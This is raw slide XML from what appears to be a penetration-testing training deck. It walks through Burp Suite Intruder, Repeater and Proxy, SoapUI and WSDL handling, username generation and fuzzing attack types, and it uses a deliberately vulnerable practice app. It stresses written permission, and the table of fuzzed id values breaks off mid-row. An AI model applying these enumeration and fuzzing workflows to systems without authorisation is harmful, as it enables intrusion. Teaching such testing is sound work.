        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19711963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Snake Intruder – Free Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake15.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964" t="8285" b="13232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1314847"/>
            <a:ext cx="7610699" cy="3944512"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32248037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Snake Intruder – Free Version Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="snake16.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5096" t="6439" b="8141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="811557" y="1261395"/>
            <a:ext cx="7520895" cy="3901753"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19996515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Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws.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t="1768" b="5699"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1245504"/>
            <a:ext cx="7924800" cy="3581136"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5172016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WSDLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws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2992" t="4324" b="4324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="728163" y="1333500"/>
            <a:ext cx="7687674" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28969406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Soap - Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws2.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154" t="4324" b="4324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="734582" y="1333500"/>
            <a:ext cx="7674845" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14412830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CO2 – Generate User Names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws3.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2669" t="4324" b="4324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="715334" y="1333500"/>
            <a:ext cx="7713332" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2454003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Intruder – Add Name List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws4.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316" t="4324" b="4324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740992" y="1333500"/>
            <a:ext cx="7662016" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17287375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Intruder – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Extract </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws5.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449" t="6441" b="5121"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785899" y="1175884"/>
            <a:ext cx="7572211" cy="4821071"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3050513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Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="burp_proxy.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4420" b="38492"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1250717"/>
            <a:ext cx="7924800" cy="3570372"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12132354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Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws6.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2506" t="4324" b="4324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="708924" y="1333500"/>
            <a:ext cx="7726161" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290716649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Intruder Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ws7.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611" t="7377" b="5800"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792309" y="1282774"/>
            <a:ext cx="7559382" cy="3965892"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28495053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Soap UI – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WSDL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="wsdl.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478" t="6824" b="6824"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1333500"/>
            <a:ext cx="7649186" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214569049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Soap UI – Create New Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="wsdl1.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="6357" b="6357"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128816221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Soap UI – Add WSDL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="wsdl2.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="6357" b="6357"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27417851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Soap UI – Default Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="wsdl3.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2992" t="4877" b="4877"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="728163" y="1333500"/>
            <a:ext cx="7687674" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366744329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Soap UI – Use Proxy With Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="wsdl4.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640" t="9159" b="9159"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1333500"/>
            <a:ext cx="7636357" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195208621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Soap UI – Send Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="wsdl5.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2992" t="4877" b="4877"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="728163" y="1333500"/>
            <a:ext cx="7687674" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5030493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Engagement Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The remaining slides are just screen shots to show what the engagement tools contain with the pro version.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35543770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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_search.png"/>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3802" t="5693" b="2980"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1432424"/>
            <a:ext cx="7623528" cy="3330076"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1284748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Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="burp_repeater.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4617" b="31843"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1261407"/>
            <a:ext cx="7924800" cy="3474164"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217911636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Comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_findComments.png"/>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4287" t="7845" b="4048"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="779480" y="1432425"/>
            <a:ext cx="7585040" cy="3287317"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12577024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Scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_findScripts.png"/>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4935" t="7559" b="4048"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="805138" y="1421735"/>
            <a:ext cx="7533724" cy="3298006"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36629782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 References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_findReferences.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287" t="7707" b="4515"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="779480" y="1453805"/>
            <a:ext cx="7585040" cy="3308696"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35576136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Analyze Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_analyzeTarget.png"/>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4611" t="6299" b="29353"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792309" y="1250712"/>
            <a:ext cx="7559382" cy="3260369"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40461278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Discover Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_discoverContent.png"/>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4122" t="7211" r="350" b="-316"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="613480" y="1304149"/>
            <a:ext cx="7917049" cy="3848306"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86978418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 Task</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_scheduleTask.png"/>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7363" t="13163" b="13163"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="901357" y="1333500"/>
            <a:ext cx="7341286" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6090228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 Manual Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="engagement_manualTest.png"/>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6392" t="7713" b="21400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="862874" y="1282788"/>
            <a:ext cx="7418261" cy="4249392"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1477395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Intruder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="burp_intruder.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4810" b="30672"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1207957"/>
            <a:ext cx="7924800" cy="3527612"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1407498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Intruder Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intruder attack types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sniper each item is fuzzed, one at a time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Battering Ram all items use the same payload in all parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pitchfork each item uses a separate payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cluster bomb each item has a payload and all possible combinations are used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1113032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Extender</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="burp_extender.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t="4225" b="18643"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1175888"/>
            <a:ext cx="7924800" cy="4217323"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4286116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Dojo-Basic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download Samurai VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://sourceforge.net/projects/samurai/files/latest/download?source=files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The rest of the slides will be using the dojo-basic web application to walk through using Burp as a proxy for pen testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dojo-basic is very simple and very vulnerable. Great for learning on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced attacks will use similar work flows and use a lot of the same tools. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27707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Permission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Make sure you have written permission to pen test the web application, mobile application and any related hardware, from the highest organizational personnel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Warn other teams that might not know about your security test, before alarms are set off.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="526927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attacks use similar workflows</a:t>
            </a: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4002993514"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1333500"/>
          <a:ext cx="7924800" cy="2225040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="39624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tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“id”:[4]}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>customer”:”customer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> name”}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“id”:[40]}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>error</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“id”:[400]}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
